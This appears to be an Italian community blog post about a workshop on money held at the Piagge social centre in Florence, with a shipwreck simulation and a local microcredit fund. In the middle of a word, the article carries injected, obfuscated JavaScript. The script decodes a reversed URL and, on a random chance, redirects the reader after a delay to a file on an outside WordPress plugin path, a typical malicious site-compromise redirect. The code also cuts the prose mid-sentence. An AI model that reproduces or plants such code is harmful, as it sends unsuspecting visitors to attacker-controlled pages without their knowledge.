Ma il denaro, che cos’è?

image_pdfimage_print

Il denaro condiziona in modo sempre più pesante la vita delle persone
e dei popoli. Ma cosa ne sappiamo veramente? Chi lo crea? In base a
quali regole? Con quali fini? E perché la moneta non dovrebbe diventare
uno strumento a servizio del benessere della gente?
Erano queste le dom (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande-premessa al laboratorio sul denaro organizzato
a fine estate dal Fondo Etico e Sociale delle Piagge insieme al Progetto
Se.Me., che opera nel quartiere 2. Con la partecipazione di Luca Iori della
cooperativa MAG 6 (Mutua Auto Gestione) di Reggio Emilia, che ha
guidato il laboratorio interattivo, al Centro Sociale Il Pozzo si è discusso
e parlato di denaro attraverso una simulazione, quasi un gioco: una cinquantina
di partecipanti chiamati a vivere un’esperienza virtuale, quella
di 5 naufraghi, sbarcati su un’isola sperduta in cui però non mancano
risorse naturali e non ci sono problemi di sopravvivenza. A rovinare lo
scenario quasi idilliaco ci pensa però uno dei sopravvissuti, un banchiere,
che inventa un sistema monetario e crea così la povertà.
Questa riflessione sui soldi è particolarmente importante nella situazione
odierna del mondo, di Firenze o delle Piagge, dove molte persone,
proprio nel nostro quartiere, vivono con una media di 600 euro al mese.
Da alcuni anni la situazione è peggiorata e le famiglie a reddito zero
aumentano vertiginosamente, tanto che anche il pasto quotidiano diventa
un problema sempre più grande. Ma è proprio dalle Piagge che
nascono anche le idee migliori per creare un’economia più solidale. Qui
si è sviluppata l’esperienza del microcredito con il Fondo Etico e Sociale
– http://fondoetico.blogspot.com/ – che oggi ha raggiunto un capitale
di circa 100mila euro e un centinaio di aderenti grazie ai quali è stato
possibile aiutare più di ottanta persone in difficoltà.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *